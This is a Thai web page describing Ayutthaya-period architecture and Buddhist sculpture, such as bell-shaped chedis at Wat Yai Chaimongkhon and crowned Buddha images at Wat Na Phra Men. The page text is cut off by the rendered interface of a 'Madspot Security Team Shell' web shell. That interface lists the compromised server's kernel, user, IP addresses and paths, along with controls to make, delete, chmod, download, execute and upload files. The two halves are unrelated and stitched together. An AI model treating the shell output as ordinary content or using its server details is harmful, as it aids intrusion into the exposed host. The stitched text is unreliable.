พระนครศรีอยุธยา

สถาปัตยกรรมและประติมากรรมในสมัยอยุธยา

   

ความโดดเด่นของงานสถาปัตยกรรม และประติมากรรมของอยุธยา ส่วนใหญ่สร้างขึ้นเพื่ออุทิศถวายพระศาสนา เป็นพุทธบูชา ความงดงามที่ปรากฏให้เห็นล้วนแสดงถึงฝีมือ ศรัทธา คติความเชื่อ เทคโนโลยีและวิทยาการ ที่ไม่ได้เกิดขึ้นเพียงชั่วอายุคนหรือเพียงแค่รุ่นสองรุ่น หากแต่เกิดจากการสั่งสม ผสมผสาน และการปรับใช้จากศิลปะอื่นๆ จนกลายเป็นเอกลักษณ์เฉพาะตนขึ้นมา

หากจะชื่นชมความงามของงานสถาปัตยกรรม และประติมากรรมของสมัยอยุธยาตอนกลางเป็นต้นไป มีลักษณะเด่นให้สังเกตได้ไม่ยาก ในงานสถาปัตยกรรมยุคนี้ มักปรากฏการสร้างเจดีย์ทรงระฆัง เช่น เจดีย์วัดใหญ่ชัยมงคล เจดีย์วัดพระศรีสรรเพชญ์ เป็นต้น อีกทั้งมีความนิยมในการสร้างโบสถ์ให้มีขนาดใหญ่และเป็นอาคารหลักของวัด ส่วนในสมัยอยุธยาตอนปลายพบสถาปัตยกรรมแบบตะวันตกผสมกับเปอร์เซีย เช่น อาคารสองชั้นที่วัดเจ้าย่า ซากอาคารที่เรียกกันว่า “กำมะเลียน” วัดกุฎีดาว เป็นต้น

สำหรับงานประติมากรรม ไม่ว่าจะเป็นช่วงสมัยใด สิ่งที่โดดเด่นที่สุดก็คือ การสร้างพระพุทธรูป โดยสมัยอยุธยาตอนกลางนิยมสร้างพระพุทธรูปทรงเครื่องน้อย แต่หากเป็นสมัยอยุธยาตอนปลาย จะนิยมสร้างพระพุทธรูปทรงเครื่องใหญ่ หรือทรงเครื่องอย่างกษัตริย์ ที่เห็นเด่นชัดคือ พระประธานในพระอุโบสถ วัดหน้าพระเมรุ ที่งดงามสมบูรณ์แบบอย่างยิ่ง  
Madspot Security Team Shell
Uname: Linux customuat01 2.6.32-32-pve #1 SMP Thu Aug 21 08:50:19 CEST 2014 x86_64
User: 33 [ www-data ] Group: 33 [ www-data ]
PHP: 5.3.18-1~dotdeb.0 Safe Mode:OFF
Our IP: 10.1.100.130 Server IP: 122.155.165.160
WEBS: CANT READ |Windows|
HDD: 1 B Free: B [0%]
Window:
Downloader: -------------
Disabled functions:All Functions Enable
cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF       MADSPOT.NET
Open_basedir:/home/cuat01/domains/customuat01.23perspective.com/public_html/:/tmp/:/usr/share/php/:/usr/share/phpMyAdmin/ Safe_mode_exec_dir: NONE Safe_mode_include_dir: NONE
Server Apache/2.2.16 (Debian)
PWD: |CURRENT|

| Access Denied! |

__MK FILE__
__MK DIR__
__DELETE__
__CHMOD__
__CHANGE DIR__
__HTTP DOWNLOAD__
__EXECUTE__
Upload file: